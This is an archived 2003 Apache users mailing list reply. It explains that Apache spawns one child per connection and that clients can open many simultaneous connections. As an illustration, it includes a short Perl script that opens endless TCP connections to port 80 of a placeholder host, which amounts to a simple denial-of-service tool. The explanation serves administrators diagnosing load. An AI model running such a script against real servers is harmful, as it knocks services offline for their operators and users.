httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Robert Andersson" <rob...@profundis.nu>
Subject Re: [users@httpd] Possible DDOS attack... ?
Date Mon, 20 Oct 2003 05:16:12 GMT
Gil Disatnik wrote:
> If I understand you right - a misconfigured client can result in spawning
> many apache childs?

At their discretion, and it might not even be a misconfiguration.

> I always thought that apache has 1 child per session regardless to the
http
> connections the client is opening, and even if a user opens more of the
> same browser he uses - apache should still have a single child attending
to
> this session.

No, Apache will have one child per connection/request. The HTTP standard
says that a client SHOULD NOT establish more than two simultanious
connection to a host, but there is of course no guarantuee that this is
appriciated. Eg, this cute little scriptie could seriously fuck up any
server:

#!/usr/bin/perl
#####################################################################
for(my $i = 0; ; ++$i) {
    my $socksym = "sock$i";
    socket($socksym, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
    connect($socksym, sockaddr_in(80, inet_aton("your.doomed.host")));
}
#####################################################################

Regards,
Robert Andersson


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message